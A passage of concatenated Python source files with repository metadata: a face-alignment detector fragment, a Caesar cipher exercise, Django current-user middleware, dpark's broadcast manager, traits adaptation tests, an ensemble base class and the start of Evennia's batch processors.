return detected_faces
@property
def reference_scale(self):
return 195
@property
def reference_x_shift(self):
return 0
@property
def reference_y_shift(self):
return 0
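# Usage sketch (paths are assumed): detections stored next to each image are
# matched by base name, so for '/data/img_001.jpg' the detector loads
# '/data/img_001.npy', '.t7' or '.pth'; the stored object must already be a
# list of boxes:
#
#   torch.save([(10.0, 20.0, 110.0, 140.0)], '/data/img_001.pth')
#   detector = FolderDetector(device='cpu')
#   boxes = detector.detect_from_image('/data/img_001.jpg')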
|
1adrianb/face-alignment
|
face_alignment/detection/folder/folder_detector.py
|
Python
|
bsd-3-clause
| 1643
|
'''
This mission is part of a set. Another one - Caesar cipher decryptor.
Your mission is to encrypt a secret message (text only, without special chars like "!", "&", "?" etc.) using the Caesar cipher, where each letter of the input text is replaced by the letter standing a fixed distance further along the alphabet. For example ("a b c", 3) == "d e f"
Example
Input: A secret message as a string (lowercase letters only and white spaces)
Output: The same string, but encrypted
Precondition:
0 < len(text) < 50
-26 < delta < 26
'''
def to_encrypt(text, delta):
alpha = 'abcdefghijklmnopqrstuvwxyz'
result = ''
for letter in text:
index = alpha.find(letter)
if index > -1:
result += alpha[(index + delta) % 26]
else:
result += ' '
return result
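# Because the shift is taken modulo 26, decryption is just encryption with the
# opposite delta, e.g. to_encrypt(to_encrypt("state secret", 5), -5) == "state secret".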
if __name__ == '__main__':
print("Example:")
print(to_encrypt('abc', 10))
#These "asserts" using only for self-checking and not necessary for auto-testing
assert to_encrypt("a b c", 3) == "d e f"
assert to_encrypt("a b c", -3) == "x y z"
assert to_encrypt("simple text", 16) == "iycfbu junj"
assert to_encrypt("important text", 10) == "swzybdkxd dohd"
assert to_encrypt("state secret", -13) == "fgngr frperg"
print("Coding complete? Click 'Check' to earn cool rewards!")
|
lisprolog/python
|
to_encrypt.py
|
Python
|
bsd-3-clause
| 1378
|
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from threading import local
USER_ATTR_NAME = getattr(settings, 'LOCAL_USER_ATTR_NAME', '_current_user')
_thread_locals = local()
def _do_set_current_user(user_fun):
setattr(_thread_locals, USER_ATTR_NAME, user_fun.__get__(user_fun, local))
def _set_current_user(user=None):
'''
Sets current user in local thread.
Can be used as a hook e.g. for shell jobs (when request object is not
available).
'''
_do_set_current_user(lambda self: user)
class ThreadLocalUserMiddleware(object):
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
# request.user closure; asserts laziness;
# memorization is implemented in
# request.user (non-data descriptor)
_do_set_current_user(lambda self: getattr(request, 'user', None))
response = self.get_response(request)
return response
def get_current_user():
current_user = getattr(_thread_locals, USER_ATTR_NAME, None)
if callable(current_user):
return current_user()
return current_user
def get_current_authenticated_user():
current_user = get_current_user()
if isinstance(current_user, AnonymousUser):
return None
return current_user
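# Minimal usage sketch (assumed project setup): with ThreadLocalUserMiddleware
# listed in MIDDLEWARE, request-handling code can look the user up without
# passing it through every call, e.g. inside a model's save():
#
#   from django_currentuser.middleware import get_current_authenticated_user
#
#   def save(self, *args, **kwargs):
#       self.modified_by = get_current_authenticated_user()
#       super(MyModel, self).save(*args, **kwargs)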
|
PaesslerAG/django-currentuser
|
django_currentuser/middleware.py
|
Python
|
bsd-3-clause
| 1343
|
from __future__ import absolute_import
import os
import zmq
import uuid as uuid_pkg
import time
import binascii
import random
import socket
import struct
import marshal
import mmap
from multiprocessing import Manager, Condition
from mmap import ACCESS_WRITE, ACCESS_READ
from dpark.utils.log import get_logger
from dpark.utils import compress, decompress, spawn
from dpark.cache import Cache
from dpark.serialize import marshalable
from dpark.env import env
import six
from six.moves import range, map, cPickle
try:
from itertools import izip
except ImportError:
izip = zip
logger = get_logger(__name__)
MARSHAL_TYPE, PICKLE_TYPE = list(range(2))
BLOCK_SHIFT = 20
BLOCK_SIZE = 1 << BLOCK_SHIFT
GUIDE_ADDR = 'NewBroadcastGuideAddr'
DOWNLOAD_ADDR = 'NewDownloadAddr'
BATCHED_BLOCKS = 3
GUIDE_STOP, GUIDE_GET_SOURCES, GUIDE_SET_SOURCES, GUIDE_REPORT_BAD = list(range(4))
SERVER_STOP, SERVER_FETCH, SERVER_FETCH_FAIL, SERVER_FETCH_OK, \
DATA_GET, DATA_GET_OK, DATA_GET_FAIL, DATA_DOWNLOADING, SERVER_CLEAR_ITEM = list(range(9))
class GuideManager(object):
def __init__(self):
self._started = False
self.guides = {}
self.host = socket.gethostname()
self.guide_thread = None
self.guide_addr = None
self.register_addr = {}
self.ctx = zmq.Context()
def start(self):
if self._started:
return
self._started = True
self.guide_thread = self.start_guide()
env.register(GUIDE_ADDR, self.guide_addr)
def start_guide(self):
sock = self.ctx.socket(zmq.REP)
port = sock.bind_to_random_port('tcp://0.0.0.0')
self.guide_addr = 'tcp://%s:%d' % (self.host, port)
def run():
logger.debug("guide start at %s", self.guide_addr)
while self._started:
if not sock.poll(1000, zmq.POLLIN):
continue
type_, msg = sock.recv_pyobj()
if type_ == GUIDE_STOP:
sock.send_pyobj(0)
break
elif type_ == GUIDE_GET_SOURCES:
uuid = msg
sources = None
if uuid in self.guides:
sources = self.guides[uuid]
else:
logger.warning('uuid %s NOT REGISTERED in guide server', uuid)
sock.send_pyobj(sources)
elif type_ == GUIDE_SET_SOURCES:
uuid, addr, bitmap = msg
if any(bitmap):
sources = None
if uuid in self.guides:
sources = self.guides[uuid]
if sources:
sources[addr] = bitmap
else:
self.guides[uuid] = {addr: bitmap}
self.register_addr[uuid] = addr
sock.send_pyobj(None)
elif type_ == GUIDE_REPORT_BAD:
uuid, addr = msg
sources = self.guides[uuid]
if addr in sources:
if addr != self.register_addr[uuid]:
del sources[addr]
else:
logger.warning('The addr %s to delete is the register Quit!!!', addr)
sock.send_pyobj(None)
else:
logger.error('Unknown guide message: %s %s', type_, msg)
sock.send_pyobj(None)
return spawn(run)
def shutdown(self):
if not self._started:
return
self._started = False
if self.guide_thread and self.guide_addr. \
startswith('tcp://%s:' % socket.gethostname()):
self.guide_thread.join(timeout=1)
if self.guide_thread.is_alive():
logger.warning("guide_thread not stopped.")
self.guide_addr = None
def check_memory(location):
try:
import psutil
pid = os.getpid()
p = psutil.Process(pid)
rss = p.memory_info().rss >> 20
logger.info('memory rss %d MB in host %s at %s',
rss, socket.gethostname(), location)
except ImportError:
logger.warning('import psutil failed')
class DownloadManager(object):
def __init__(self):
self._started = False
self.server_thread = None
self.download_threads = {}
self.uuid_state_dict = None
self.uuid_map_dict = None
self.guide_addr = None
self.server_addr = None
self.host = None
self.ctx = None
self.random_inst = None
self.master_broadcast_blocks = {}
def start(self):
if self._started:
return
self.manager = manager = Manager()
self.shared_uuid_fn_dict = manager.dict()
self.shared_uuid_map_dict = manager.dict()
self.shared_master_blocks = manager.dict()
self.download_cond = Condition()
self._started = True
self.ctx = zmq.Context()
self.host = socket.gethostname()
if GUIDE_ADDR not in env.environ:
start_guide_manager()
self.guide_addr = env.get(GUIDE_ADDR)
self.random_inst = random.SystemRandom()
self.server_addr, self.server_thread = self.start_server()
self.uuid_state_dict = {}
self.uuid_map_dict = {}
self.master_broadcast_blocks = {}
env.register(DOWNLOAD_ADDR, self.server_addr)
def start_server(self):
sock = self.ctx.socket(zmq.REP)
sock.setsockopt(zmq.LINGER, 0)
port = sock.bind_to_random_port("tcp://0.0.0.0")
server_addr = 'tcp://%s:%d' % (self.host, port)
guide_sock = self.ctx.socket(zmq.REQ)
guide_sock.setsockopt(zmq.LINGER, 0)
guide_sock.connect(self.guide_addr)
def run():
logger.debug("server started at %s", server_addr)
while self._started:
if not sock.poll(1000, zmq.POLLIN):
continue
type_, msg = sock.recv_pyobj()
logger.debug('server recv: %s %s', type_, msg)
if type_ == SERVER_STOP:
sock.send_pyobj(None)
break
elif type_ == SERVER_FETCH:
uuid, indices, client_addr = msg
if uuid in self.master_broadcast_blocks:
block_num = len(self.master_broadcast_blocks[uuid])
bls = []
for index in indices:
if index >= block_num:
logger.warning('input index too big %s for '
'len of blocks %d from host %s',
str(indices), block_num, client_addr)
sock.send_pyobj((SERVER_FETCH_FAIL, None))
else:
bls.append(self.master_broadcast_blocks[uuid][index])
sock.send_pyobj((SERVER_FETCH_OK, (indices, bls)))
elif uuid in self.uuid_state_dict:
fd = os.open(self.uuid_state_dict[uuid][0], os.O_RDONLY)
mmfp = mmap.mmap(fd, 0, access=ACCESS_READ)
os.close(fd)
bitmap = self.uuid_map_dict[uuid]
block_num = len(bitmap)
bls = []
for index in indices:
if index >= block_num:
logger.warning('input index too big %s for '
'len of blocks %d from host %s',
str(indices), block_num, client_addr)
sock.send_pyobj((SERVER_FETCH_FAIL, None))
else:
mmfp.seek(bitmap[index][0])
block = mmfp.read(bitmap[index][1])
bls.append(block)
mmfp.close()
sock.send_pyobj((SERVER_FETCH_OK, (indices, bls)))
else:
logger.warning('server fetch failed for uuid %s '
'not exists in server %s from host %s',
uuid, socket.gethostname(), client_addr)
sock.send_pyobj((SERVER_FETCH_FAIL, None))
elif type_ == DATA_GET:
uuid, compressed_size = msg
if uuid not in self.uuid_state_dict or not self.uuid_state_dict[uuid][1]:
if uuid not in self.download_threads:
sources = self._get_sources(uuid, guide_sock)
if not sources:
logger.warning('get sources from guide server failed in host %s',
socket.gethostname())
sock.send_pyobj(DATA_GET_FAIL)
continue
self.download_threads[uuid] = spawn(self._download_blocks,
*[sources, uuid, compressed_size])
sock.send_pyobj(DATA_DOWNLOADING)
else:
sock.send_pyobj(DATA_DOWNLOADING)
else:
sock.send_pyobj(DATA_GET_OK)
elif type_ == SERVER_CLEAR_ITEM:
uuid = msg
self.clear(uuid)
sock.send_pyobj(None)
else:
logger.error('Unknown server message: %s %s', type_, msg)
sock.send_pyobj(None)
sock.close()
logger.debug("stop Broadcast server %s", server_addr)
for uuid in list(self.uuid_state_dict.keys()):
self.clear(uuid)
return server_addr, spawn(run)
def get_blocks(self, uuid):
if uuid in self.master_broadcast_blocks:
return self.master_broadcast_blocks[uuid]
if uuid in self.shared_master_blocks:
return self.shared_master_blocks[uuid]
def register_blocks(self, uuid, blocks):
if uuid in self.master_broadcast_blocks:
logger.warning('the block uuid %s exists in dict', uuid)
return
self.master_broadcast_blocks[uuid] = blocks
self.shared_master_blocks[uuid] = blocks
def _get_sources(self, uuid, source_sock):
try:
source_sock.send_pyobj((GUIDE_GET_SOURCES,
uuid))
sources = source_sock.recv_pyobj()
except:
logger.warning('GET sources failed for addr %s with ZMQ ERR',
self.server_addr)
sources = {}
return sources
def _update_sources(self, uuid, bitmap, source_sock):
try:
source_sock.send_pyobj((GUIDE_SET_SOURCES,
(uuid, self.server_addr, bitmap)))
source_sock.recv_pyobj()
except:
pass
def _download_blocks(self, sources, uuid, compressed_size):
block_num = 0
bitmap = [0]
write_mmap_handler = None
download_guide_sock = self.ctx.socket(zmq.REQ)
download_guide_sock.setsockopt(zmq.LINGER, 0)
download_guide_sock.connect(self.guide_addr)
def _report_bad(addr):
logger.debug('fetch blocks failed from server %s', addr)
download_guide_sock.send_pyobj((GUIDE_REPORT_BAD, (uuid, addr)))
download_guide_sock.recv_pyobj()
def _fetch(addr, indices, bit_map):
sock = self.ctx.socket(zmq.REQ)
try:
sock.setsockopt(zmq.LINGER, 0)
sock.connect(addr)
sock.send_pyobj((SERVER_FETCH, (uuid, indices, self.server_addr)))
avail = sock.poll(1 * 1000, zmq.POLLIN)
check_sock = None
if not avail:
try:
check_sock = socket.socket()
addr_list = addr[len('tcp://'):].split(':')
addr_list[1] = int(addr_list[1])
check_sock.connect(tuple(addr_list))
except Exception as e:
logger.warning('connect the addr %s failed with exception %s',
addr, e)
_report_bad(addr)
else:
logger.debug("%s recv broadcast %s from %s timeout",
self.server_addr, str(indices), addr)
finally:
if check_sock:
check_sock.close()
return
result, msg = sock.recv_pyobj()
if result == SERVER_FETCH_FAIL:
_report_bad(addr)
return
if result == SERVER_FETCH_OK:
indices, blocks = msg
for rank, index in enumerate(indices):
if blocks[rank] is not None:
write_mmap_handler.seek(bit_map[index][0])
write_mmap_handler.write(blocks[rank])
bitmap[index] = bit_map[index]
else:
raise RuntimeError('Unknown server response: %s %s' % (result, msg))
finally:
sock.close()
final_path = env.workdir.alloc_tmp_file("broadcast")
self.uuid_state_dict[uuid] = (final_path, False)
fp = open(final_path, 'wb')
fp.truncate(compressed_size)
fp.close()
fd = os.open(final_path, os.O_RDWR)
write_mmap_handler = mmap.mmap(fd, 0,
access=ACCESS_WRITE)
os.close(fd)
while not all(bitmap):
remote = []
for _addr, _bitmap in six.iteritems(sources):
if block_num == 0:
block_num = len(_bitmap)
bitmap = [0] * block_num
self.uuid_map_dict[uuid] = bitmap
if not _addr.startswith('tcp://%s:' % self.host):
remote.append((_addr, _bitmap))
self.random_inst.shuffle(remote)
for _addr, _bitmap in remote:
_indices = [i for i in range(block_num) if not bitmap[i] and _bitmap[i]]
if _indices:
self.random_inst.shuffle(_indices)
_fetch(_addr, _indices[:BATCHED_BLOCKS], _bitmap)
self._update_sources(uuid, bitmap, download_guide_sock)
sources = self._get_sources(uuid, download_guide_sock)
write_mmap_handler.flush()
write_mmap_handler.close()
self.shared_uuid_map_dict[uuid] = bitmap
self.shared_uuid_fn_dict[uuid] = self.uuid_state_dict[uuid][0]
self.uuid_state_dict[uuid] = self.uuid_state_dict[uuid][0], True
download_guide_sock.close()
with self.download_cond:
self.download_cond.notify_all()
def clear(self, uuid):
if uuid in self.master_broadcast_blocks:
del self.master_broadcast_blocks[uuid]
del self.shared_master_blocks[uuid]
if uuid in self.uuid_state_dict:
del self.uuid_state_dict[uuid]
if uuid in self.shared_uuid_fn_dict:
del self.shared_uuid_fn_dict[uuid]
del self.shared_uuid_map_dict[uuid]
def shutdown(self):
if not self._started:
return
self._started = False
if self.server_thread and self.server_addr. \
startswith('tcp://%s:' % socket.gethostname()):
for _, th in six.iteritems(self.download_threads):
th.join(timeout=0.1) # only in executor, not needed
self.server_thread.join(timeout=1)
if self.server_thread.is_alive():
logger.warning("Download mananger server_thread not stopped.")
self.manager.shutdown() # shutdown will try join and terminate server process
def accumulate_list(l):
acc = 0
acc_l = []
for item in l:
acc_l.append(acc)
acc += item
acc_l.append(acc)
return acc_l
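# e.g. accumulate_list([3, 5, 2]) == [0, 3, 8, 10]; to_blocks() below zips the
# prefix sums with the sizes to get an (offset, size) pair for every block.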
class BroadcastManager(object):
header_fmt = '>BI'
header_len = struct.calcsize(header_fmt)
def __init__(self):
self._started = False
self.guide_addr = None
self.download_addr = None
self.cache = None
self.shared_uuid_fn_dict = None
self.shared_uuid_map_dict = None
self.download_cond = None
self.ctx = None
def start(self):
if self._started:
return
self._started = True
start_download_manager()
self.guide_addr = env.get(GUIDE_ADDR)
self.download_addr = env.get(DOWNLOAD_ADDR)
self.cache = Cache()
self.ctx = zmq.Context()
self.shared_uuid_fn_dict = _download_manager.shared_uuid_fn_dict
self.shared_uuid_map_dict = _download_manager.shared_uuid_map_dict
self.download_cond = _download_manager.download_cond
def register(self, uuid, value):
self.start()
if uuid in self.shared_uuid_fn_dict:
raise RuntimeError('broadcast %s has already registered' % uuid)
blocks, size, block_map = self.to_blocks(uuid, value)
_download_manager.register_blocks(uuid, blocks)
self._update_sources(uuid, block_map)
self.cache.put(uuid, value)
return size
def _update_sources(self, uuid, bitmap):
guide_sock = self.ctx.socket(zmq.REQ)
try:
guide_sock.setsockopt(zmq.LINGER, 0)
guide_sock.connect(self.guide_addr)
guide_sock.send_pyobj((GUIDE_SET_SOURCES,
(uuid, self.download_addr, bitmap)))
guide_sock.recv_pyobj()
finally:
guide_sock.close()
def clear(self, uuid):
assert self._started
self.cache.put(uuid, None)
sock = self.ctx.socket(zmq.REQ)
sock.connect(self.download_addr)
sock.send_pyobj((SERVER_CLEAR_ITEM, uuid))
sock.recv_pyobj()
sock.close()
def fetch(self, uuid, compressed_size):
start_download_manager()
self.start()
value = self.cache.get(uuid)
if value is not None:
return value
blocks = _download_manager.get_blocks(uuid)
if blocks is None:
blocks = self.fetch_blocks(uuid, compressed_size)
value = self.from_blocks(uuid, blocks)
return value
@staticmethod
def _get_blocks_by_filename(file_name, block_map):
fp = open(file_name, 'rb')
buf = fp.read()
blocks = [buf[offset: offset + size] for offset, size in block_map]
fp.close()
return blocks
def fetch_blocks(self, uuid, compressed_size):
if uuid in self.shared_uuid_fn_dict:
return self._get_blocks_by_filename(self.shared_uuid_fn_dict[uuid],
self.shared_uuid_map_dict[uuid])
download_sock = self.ctx.socket(zmq.REQ)
download_sock.connect(self.download_addr)
download_sock.send_pyobj((DATA_GET,
(uuid, compressed_size)))
res = download_sock.recv_pyobj()
if res == DATA_GET_OK:
return self._get_blocks_by_filename(self.shared_uuid_fn_dict[uuid],
self.shared_uuid_map_dict[uuid])
if res == DATA_GET_FAIL:
raise RuntimeError('Data GET failed for uuid:%s' % uuid)
while True:
with self.download_cond:
if uuid not in self.shared_uuid_fn_dict:
self.download_cond.wait()
else:
break
if uuid in self.shared_uuid_fn_dict:
return self._get_blocks_by_filename(self.shared_uuid_fn_dict[uuid],
self.shared_uuid_map_dict[uuid])
else:
raise RuntimeError('get blocks failed')
def to_blocks(self, uuid, obj):
try:
if marshalable(obj):
buf = marshal.dumps((uuid, obj))
type_ = MARSHAL_TYPE
else:
buf = cPickle.dumps((uuid, obj), -1)
type_ = PICKLE_TYPE
except Exception:
buf = cPickle.dumps((uuid, obj), -1)
type_ = PICKLE_TYPE
checksum = binascii.crc32(buf) & 0xFFFF
stream = struct.pack(self.header_fmt, type_, checksum) + buf
blockNum = (len(stream) + (BLOCK_SIZE - 1)) >> BLOCK_SHIFT
blocks = [compress(stream[i * BLOCK_SIZE:(i + 1) * BLOCK_SIZE]) for i in range(blockNum)]
sizes = [len(block) for block in blocks]
size_l = accumulate_list(sizes)
block_map = list(izip(size_l[:-1], sizes))
return blocks, size_l[-1], block_map
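# Layout produced above: the value is serialized once as
#   struct.pack('>BI', type_, checksum) + marshal/pickle payload,
# sliced into 1 MiB (BLOCK_SIZE) chunks and compressed chunk by chunk;
# block_map records each chunk's (offset, compressed size) in the final stream.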
def from_blocks(self, uuid, blocks):
stream = b''.join(map(decompress, blocks))
type_, checksum = struct.unpack(self.header_fmt, stream[:self.header_len])
buf = stream[self.header_len:]
_checksum = binascii.crc32(buf) & 0xFFFF
if _checksum != checksum:
raise RuntimeError('Wrong blocks: checksum: %s, expected: %s' % (
_checksum, checksum))
if type_ == MARSHAL_TYPE:
_uuid, value = marshal.loads(buf)
elif type_ == PICKLE_TYPE:
_uuid, value = cPickle.loads(buf)
else:
raise RuntimeError('Unknown serialization type: %s' % type_)
if uuid != _uuid:
raise RuntimeError('Wrong blocks: uuid: %s, expected: %s' % (_uuid, uuid))
return value
def shutdown(self):
if not self._started:
return
self._started = False
_manager = BroadcastManager()
_download_manager = DownloadManager()
_guide_manager = GuideManager()
def start_guide_manager():
_guide_manager.start()
def start_download_manager():
_download_manager.start()
def stop_manager():
_manager.shutdown()
_download_manager.shutdown()
_guide_manager.shutdown()
env.environ.pop(GUIDE_ADDR, None)
env.environ.pop(DOWNLOAD_ADDR, None)
class Broadcast(object):
def __init__(self, value):
assert value is not None, 'broadcast object should not been None'
self.uuid = str(uuid_pkg.uuid4())
self.value = value
self.compressed_size = _manager.register(self.uuid, self.value)
block_num = (self.compressed_size + BLOCK_SIZE - 1) >> BLOCK_SHIFT
self.bytes = block_num * BLOCK_SIZE
logger.info("broadcast %s in %d blocks, %d bytes", self.uuid, block_num, self.compressed_size)
def clear(self):
_manager.clear(self.uuid)
def __getstate__(self):
return self.uuid, self.compressed_size
def __setstate__(self, v):
self.uuid, self.compressed_size = v
def __getattr__(self, name):
if name != 'value':
return getattr(self.value, name)
t = time.time()
value = _manager.fetch(self.uuid, self.compressed_size)
if value is None:
raise RuntimeError("fetch broadcast failed")
env.task_stats.secs_broadcast += time.time() - t
self.value = value
return value
def __len__(self):
return len(self.value)
def __iter__(self):
return self.value.__iter__()
def __getitem__(self, key):
return self.value.__getitem__(key)
def __contains__(self, item):
return self.value.__contains__(item)
def __missing__(self, key):
return self.value.__missing__(key)
def __reversed__(self):
return self.value.__reversed__()
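# Driver-side usage sketch (surrounding dpark job code assumed): wrap a large
# read-only value once and ship the small handle to tasks; workers fetch and
# cache the blocks lazily on first access of .value (or any proxied attribute):
#
#   lookup = Broadcast(big_dict)
#   hits = rdd.map(lambda key: lookup.value.get(key)).collect()
#   lookup.clear()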
|
douban/dpark
|
dpark/broadcast.py
|
Python
|
bsd-3-clause
| 24223
|
###############################################################################
# Copyright 2014 Enthought, Inc.
###############################################################################
from traits.adaptation.api import reset_global_adaptation_manager
from traits.api import HasTraits, Instance, List, register_factory, TraitError
from traits.testing.unittest_tools import unittest
class Foo(HasTraits):
pass
class Bar(HasTraits):
pass
def bar_to_foo_adapter(bar):
return Foo()
class FooContainer(HasTraits):
not_adapting_foo = Instance(Foo)
adapting_foo = Instance(Foo, adapt='yes')
not_adapting_foo_list = List(Foo)
adapting_foo_list = List(Instance(Foo, adapt='yes'))
class TestAutomaticAdaptation(unittest.TestCase):
#### 'TestCase' protocol ##################################################
def setUp(self):
reset_global_adaptation_manager()
#### Tests ################################################################
def test_instance_trait_automatic_adaptation(self):
bar = Bar()
foo_container = FooContainer()
# Before a Bar->Foo adapter is registered.
with self.assertRaises(TraitError):
foo_container.not_adapting_foo = bar
with self.assertRaises(TraitError):
foo_container.adapting_foo = bar
# After a Bar->Foo adapter is registered.
register_factory(bar_to_foo_adapter, Bar, Foo)
with self.assertRaises(TraitError):
foo_container.not_adapting_foo = bar
foo_container.adapting_foo = bar
self.assertIsInstance(foo_container.adapting_foo, Foo)
def test_list_trait_automatic_adaptation(self):
bar = Bar()
foo_container = FooContainer()
# Before a Bar->Foo adapter is registered.
with self.assertRaises(TraitError):
foo_container.not_adapting_foo_list = [bar]
with self.assertRaises(TraitError):
foo_container.adapting_foo_list = [bar]
# After a Bar->Foo adapter is registered.
register_factory(bar_to_foo_adapter, Bar, Foo)
with self.assertRaises(TraitError):
foo_container.not_adapting_foo_list = [bar]
foo_container.adapting_foo_list = [bar]
self.assertIsInstance(foo_container.adapting_foo_list[0], Foo)
|
burnpanck/traits
|
traits/tests/test_automatic_adaptation.py
|
Python
|
bsd-3-clause
| 2338
|
"""
Base class for ensemble-based estimators.
"""
# Authors: Gilles Louppe
# License: BSD 3 clause
import multiprocessing
import numpy as np
from ..base import clone
from ..base import BaseEstimator
from ..base import MetaEstimatorMixin
class BaseEnsemble(BaseEstimator, MetaEstimatorMixin):
"""Base class for all ensemble classes.
Warning: This class should not be used directly. Use derived classes
instead.
Parameters
----------
base_estimator : object, optional (default=None)
The base estimator from which the ensemble is built.
n_estimators : integer
The number of estimators in the ensemble.
estimator_params : list of strings
The list of attributes to use as parameters when instantiating a
new base estimator. If none are given, default parameters are used.
Attributes
----------
base_estimator_ : estimator
The base estimator from which the ensemble is grown.
estimators_ : list of estimators
The collection of fitted base estimators.
"""
def __init__(self, base_estimator, n_estimators=10,
estimator_params=tuple()):
# Set parameters
self.base_estimator = base_estimator
self.n_estimators = n_estimators
self.estimator_params = estimator_params
# Don't instantiate estimators now! Parameters of base_estimator might
# still change. Eg., when grid-searching with the nested object syntax.
# This needs to be filled by the derived classes.
self.estimators_ = []
def _validate_estimator(self, default=None):
"""Check the estimator and the n_estimator attribute, set the
`base_estimator_` attribute."""
if self.n_estimators <= 0:
raise ValueError("n_estimators must be greater than zero, "
"got {0}.".format(self.n_estimators))
if self.base_estimator is not None:
self.base_estimator_ = self.base_estimator
else:
self.base_estimator_ = default
if self.base_estimator_ is None:
raise ValueError("base_estimator cannot be None")
def _make_estimator(self, append=True):
"""Make and configure a copy of the `base_estimator_` attribute.
Warning: This method should be used to properly instantiate new
sub-estimators.
"""
estimator = clone(self.base_estimator_)
estimator.set_params(**dict((p, getattr(self, p))
for p in self.estimator_params))
if append:
self.estimators_.append(estimator)
return estimator
def __len__(self):
"""Returns the number of estimators in the ensemble."""
return len(self.estimators_)
def __getitem__(self, index):
"""Returns the index'th estimator in the ensemble."""
return self.estimators_[index]
def __iter__(self):
"""Returns iterator over estimators in the ensemble."""
return iter(self.estimators_)
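# e.g. a derived ensemble might declare estimator_params=('max_depth', 'random_state');
# _make_estimator() then copies self.max_depth and self.random_state onto every
# clone of base_estimator_ (these attribute names are only illustrative).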
def _partition_estimators(n_estimators, n_jobs):
"""Private function used to partition estimators between jobs."""
# Compute the number of jobs
n_jobs = min(_get_n_jobs(n_jobs), n_estimators)
# Partition estimators between jobs
n_estimators_per_job = (n_estimators // n_jobs) * np.ones(n_jobs,
dtype=np.int)
n_estimators_per_job[:n_estimators % n_jobs] += 1
starts = np.cumsum(n_estimators_per_job)
return n_jobs, n_estimators_per_job.tolist(), [0] + starts.tolist()
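# e.g. _partition_estimators(10, 3) == (3, [4, 3, 3], [0, 4, 7, 10]):
# three jobs receive 4/3/3 estimators, starting at offsets 0, 4 and 7.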
def _get_n_jobs(n_jobs):
"""Get number of jobs for the computation.
This function reimplements the logic of joblib to determine the actual
number of jobs depending on the cpu count. If -1 all CPUs are used.
If 1 is given, no parallel computing code is used at all, which is useful
for debugging. For n_jobs below -1, (n_cpus + 1 + n_jobs) are used.
Thus for n_jobs = -2, all CPUs but one are used.
Parameters
----------
n_jobs : int
Number of jobs stated in joblib convention.
Returns
-------
n_jobs : int
The actual number of jobs as positive integer.
Examples
--------
>>> from sklearn.utils import _get_n_jobs
>>> _get_n_jobs(4)
4
>>> jobs = _get_n_jobs(-2)
>>> assert jobs == max(cpu_count() - 1, 1)
>>> _get_n_jobs(0)
Traceback (most recent call last):
...
ValueError: Parameter n_jobs == 0 has no meaning.
"""
if n_jobs < 0:
return max(multiprocessing.cpu_count() + 1 + n_jobs, 1)
elif n_jobs == 0:
raise ValueError('Parameter n_jobs == 0 has no meaning.')
else:
return n_jobs
|
psarka/uplift
|
uplift/ensemble/base.py
|
Python
|
bsd-3-clause
| 4,748
|
"""
Batch processors
These commands implements the 'batch-command' and 'batch-code'
processors, using the functionality in src.utils.batchprocessors.
They allow for offline world-building.
Batch-command is the simpler system. This reads a file (*.ev)
containing a list of in-game commands and executes them in sequence as
if they had been entered in the game (including permission checks
etc).
Example batch-command file: game/gamesrc/commands/examples/batch_cmds.ev
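For illustration only, a hypothetical batch-command (*.ev) file might look
roughly like the sketch below (the commands and room name are made up; the
example file above remains the authoritative reference for the format).
Comment lines starting with '#' conventionally separate the individual
entries:
    # build a small test area
    @dig Test Room
    # move there
    @teleport Test Room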
Batch-code is a full-fledged python code interpreter that reads blocks
of python code (*.py) and executes them in sequence. This allows for
much more power than Batch-command, but requires knowing Python and
the Evennia API. It is also a severe security risk and should
therefore always be limited to superusers only.
Example batch-code file: game/gamesrc/commands/examples/batch_code.py
"""
from traceback import format_exc
from django.conf import settings
from src.utils.batchprocessors import BATCHCMD, BATCHCODE
from src.commands.cmdset import CmdSet
from src.commands.default.muxcommand import MuxCommand
from src.utils import utils
# limit symbols for API inclusion
__all__ = ("CmdBatchCommands", "CmdBatchCode")
_HEADER_WIDTH = 70
_UTF8_ERROR = \
"""
{rDecode error in '%s'.{n
This file contains non-ascii character(s). This is common if you
wrote some input in a language that has more letters and special
symbols than English, such as accents or umlauts. This is usually
fine and fully supported! But for Evennia to know how to decode such
characters in a universal way, the batchfile must be saved with the
international 'UTF-8' encoding. This file is not.
Please re-save the batchfile with the UTF-8 encoding (refer to the
documentation of your text editor on how to do this, or switch to a
better featured one) and try again.
The (first) error was found with a character on line %s in the file.
"""
_PROCPOOL_BATCHCMD_SOURCE = """
from src.commands.default.batchprocess import batch_cmd_exec, step_pointer, BatchSafeCmdSet
caller.ndb.batch_stack = commands
caller.ndb.batch_stackptr = 0
caller.ndb.batch_batchmode = "batch_commands"
caller.cmdset.add(BatchSafeCmdSet)
for inum in range(len(commands)):
print "command:", inum
caller.cmdset.add(BatchSafeCmdSet)
if not batch_cmd_exec(caller):
break
step_pointer(caller, 1)
print "leaving run ..."
"""
_PROCPOOL_BATCHCODE_SOURCE = """
from src.commands.default.batchprocess import batch_code_exec, step_pointer, BatchSafeCmdSet
caller.ndb.batch_stack = codes
caller.ndb.batch_stackptr = 0
caller.ndb.batch_batchmode = "batch_code"
caller.cmdset.add(BatchSafeCmdSet)
for inum in range(len(codes)):
print "code:", inum
caller.cmdset.add(BatchSafeCmdSet)
if not batch_code_exec(caller):
break
step_pointer(caller, 1)
print "leaving run ..."
"""
#------------------------------------------------------------
# Helper functions
#------------------------------------------------------------
def format_header(caller, entry):
"""
Formats a header
"""
width = _HEADER_WIDTH - 10
entry = entry.strip()
header = utils.crop(entry, width=width)
ptr = caller.ndb.batch_stackptr + 1
stacklen = len(caller.ndb.batch_stack)
header = "{w%02i/%02i{G: %s{n" % (ptr, stacklen, header)
# add extra space to the side for padding.
header = "%s%s" % (header, " "*(width - len(header)))
header = header.replace('\n', '\\n')
return header
def format_code(entry):
"""
Formats the viewing of code and errors
"""
code = ""
for line in entry.split('\n'):
code += "\n{G>>>{n %s" % line
return code.strip()
def batch_cmd_exec(caller):
"""
Helper function for executing a single batch-command entry
"""
ptr = caller.ndb.batch_stackptr
stack = caller.ndb.batch_stack
command = stack[ptr]
caller.msg(format_header(caller, command))
try:
caller.execute_cmd(command)
except Exception:
caller.msg(format_code(format_exc()))
return False
return True
def batch_code_exec(caller):
"""
Helper function for executing a single batch-code entry
"""
ptr = caller.ndb.batch_stackptr
stack = caller.ndb.batch_stack
debug = caller.ndb.batch_debug
codedict = stack[ptr]
caller.msg(format_header(caller, codedict['code']))
err = BATCHCODE.code_exec(codedict,
extra_environ={"caller":caller}, debug=debug)
if err:
caller.msg(format_code(err))
return False
return True
def step_pointer(caller, step=1):
"""
Step in stack, returning the item located.
stackptr - current position in stack
stack - the stack of units
step - how many steps to move from stackptr
